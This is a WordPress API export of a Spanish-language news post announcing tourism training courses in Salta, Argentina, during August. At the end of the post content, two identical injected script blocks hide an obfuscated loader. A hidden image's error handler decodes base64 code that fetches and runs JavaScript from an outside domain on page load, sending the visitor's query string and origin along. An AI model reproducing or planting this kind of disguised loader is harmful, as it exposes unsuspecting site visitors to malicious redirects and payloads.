{"id":2941,"date":"2023-08-02T12:45:11","date_gmt":"2023-08-02T15:45:11","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2941"},"modified":"2025-08-14T00:11:20","modified_gmt":"2025-08-14T03:11:20","slug":"cursos-de-capacitacion-en-turismo-durante-agosto","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2941","title":{"rendered":"Cursos de capacitaci\u00f3n en turismo durante agosto"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#9e0363\"><em>Las capacitaciones est\u00e1n destinadas a prestadores tur\u00edsticos y se realizar\u00e1n de manera virtual y presencial. Las inscripciones son en www.turismotecapacita.com En tanto el curso Gu\u00eda de Cicloturismo ofrecido por Naci\u00f3n requiere preinscripci\u00f3n en https:\/\/www.argentina.gob.ar\/turismoydeportes\/capacitate\/capacitate-turismo\/cursos-turismo-naturaleza<\/em><\/h5>\n\n\n\n<p>El Ministerio de Turismo y Deportes contin\u00faa con los cursos de formaci\u00f3n del programa Turismo te Capacita que durante agosto ofrece distintas opciones. Para informes e inscripci\u00f3n se debe ingresar a\u00a0<a href=\"http:\/\/www.turismotecapacita.com\/\" target=\"_blank\" rel=\"noopener\" title=\"\">http:\/\/www.turismotecapacita.com<\/a><\/p>\n\n\n\n<p>Los cursos de ingl\u00e9s y portugu\u00e9s, a cargo del Instituto Salte\u00f1o de Idioma,s contin\u00faan los d\u00edas estipulados para los distintos niveles. Comenzaron en abril y se extender\u00e1n hasta noviembre.&nbsp;<\/p>\n\n\n\n<p>Por otra parte, emprendedores podr\u00e1n realizar de manera personalizada, a trav\u00e9s de mentor\u00edas y capacitaciones, el curso El Poder de los Detalles. Mentor\u00eda en el que profesionales asesorar\u00e1n en tem\u00e1ticas de inter\u00e9s. Hoy&nbsp;mi\u00e9rcoles 3, Nelson Velizan se referir\u00e1 a C\u00f3mo me presento al mundo digital; en tanto, el mi\u00e9rcoles 17, Cecilia Camou expondr\u00e1 sobre &nbsp;C\u00f3mo renovar la experiencia tur\u00edstica; los cursos son virtuales.&nbsp;<\/p>\n\n\n\n<p>La jornada Emprendedores en Acci\u00f3n por un Destino Sostenible que se llevar\u00e1 a cabo el mi\u00e9rcoles 9 de 9 a 13 hs en la Usina Cultural tiene entre sus objetivos: Potenciar el trabajo de capacitaci\u00f3n y mentor\u00eda para continuar mejorando a trav\u00e9s de los detalles, la experiencia tur\u00edstica en el destino; propiciar la vinculaci\u00f3n de los emprendimientos para incrementar y fortalecer las habilidades de cooperaci\u00f3n y comunicaci\u00f3n; impulsar los criterios de sostenibilidad en el desarrollo de proyectos tur\u00edsticos; y acercar herramientas de cr\u00e9ditos vigentes para el sector tur\u00edstico.<\/p>\n\n\n\n<p>En tanto el mi\u00e9rcoles 6, el viernes 25 y el mi\u00e9rcoles 30 se podr\u00e1 participar del curso Ruta de San Francisco Solano que tiene por objetivo brindar herramientas que permitan optimizar la atenci\u00f3n del turista y desarrollar el circuito la \u00abRuta de San Francisco Solano\u201d. Se llevar\u00e1 a cabo con modalidad virtual.&nbsp;<\/p>\n\n\n\n<p>El mi\u00e9rcoles 10 y el jueves 11; y el jueves 31 y 1 de setiembre el Dr. Rodolfo Pastore ofrecer\u00e1 en Salta capital los cursos de Primeros Auxilios Nivel I y II; se realizar\u00e1n de 9:00 a 13:00 hs, en el Mercado Artesanal de Salta, Av. San Mart\u00edn 2552 y est\u00e1n destinados a Prestadores de Turismo y Gu\u00edas.<\/p>\n\n\n\n<p>En el marco del Sello FormAR del Ministerio de Turismo y Deportes de Naci\u00f3n, con el prop\u00f3sito de certificar el trabajo que realizan las \u00e1reas de Capacitaci\u00f3n y\/o Formaci\u00f3n de los organismos provinciales se podr\u00e1 cursar el viernes 11 Atenci\u00f3n al cliente y manejo de quejas. Est\u00e1 destinado al personal de la Unidad de Parques Urbanos.<\/p>\n\n\n\n<p>Gu\u00edas, tour operadores de turismo aventura y todas aquellas personas que quieran dirigir una experiencia de turismo aventura podr\u00e1n participar el jueves 17 del taller Introducci\u00f3n a la &nbsp;Sustentabilidad en Turismo Aventura que tiene por objeto dar a conocer los principios de sustentabilidad que deben poner en pr\u00e1ctica para el logro de un guiado de bajo impacto socio-ambiental.<\/p>\n\n\n\n<p>La capacitaci\u00f3n Iniciaci\u00f3n a la Observaci\u00f3n de Aves se llevar\u00e1 a cabo en Seclant\u00e1s el mi\u00e9rcoles 23 y en La Poma el jueves 24 y viernes 25 con la finalidad de brindar conocimiento sobre las competencias y habilidades que requiere la actividad, motivarlos a generar emprendimientos que incluya las observaciones de aves, adem\u00e1s adquirir conocimiento en la interpretaci\u00f3n de la naturaleza y la cultura local, el dise\u00f1o de circuitos de observaci\u00f3n. Incluye clases te\u00f3ricas y salidas de campo, donde se abordar\u00e1n t\u00e9cnicas de observaci\u00f3n, identificaci\u00f3n de voces y cantos de las especies de aves de la zona.Por \u00faltimo el lunes 28 comenzar\u00e1 en Salta capital el curso Gu\u00eda de Cicloturismo que se extender\u00e1 hasta el 3 de setiembre. Esta capacitaci\u00f3n se realizar\u00e1 en el marco del programa La Ruta Natural; est\u00e1 dirigido a prestadores de servicios tur\u00edsticos vinculados a la naturaleza que hayan certificado los cursos GRAN y WFR. El curso es con cupo limitado, se debe registrar preinscripci\u00f3n hasta el 7 de agosto en\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/capacitate\/capacitate-turismo\/cursos-turismo-naturaleza\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/www.argentina.gob.ar\/turismoydeportes\/capacitate\/capacitate-turismo\/cursos-turismo-naturaleza<\/a><\/p>\n\n\n\n<p>Se recibir\u00e1 notificaci\u00f3n de aceptaci\u00f3n al curso hasta 10 d\u00edas antes de su inicio, al correo electr\u00f3nico ingresado en su ficha de inscripci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cursos-de-capacitacion-en-turismo-durante-agosto-90990\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las capacitaciones est\u00e1n destinadas a prestadores tur\u00edsticos y se realizar\u00e1n de manera virtual y presencial. Las inscripciones son en www.turismotecapacita.com En tanto el curso Gu\u00eda de Cicloturismo ofrecido por Naci\u00f3n requiere preinscripci\u00f3n en https:\/\/www.argentina.gob.ar\/turismoydeportes\/capacitate\/capacitate-turismo\/cursos-turismo-naturaleza El Ministerio de Turismo y Deportes contin\u00faa con los cursos de formaci\u00f3n del programa Turismo te Capacita que durante agosto ofrece [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2942,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11],"tags":[],"class_list":{"0":"post-2941","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2941"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2941"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2941\/revisions"}],"predecessor-version":[{"id":7005,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2941\/revisions\/7005"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2942"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}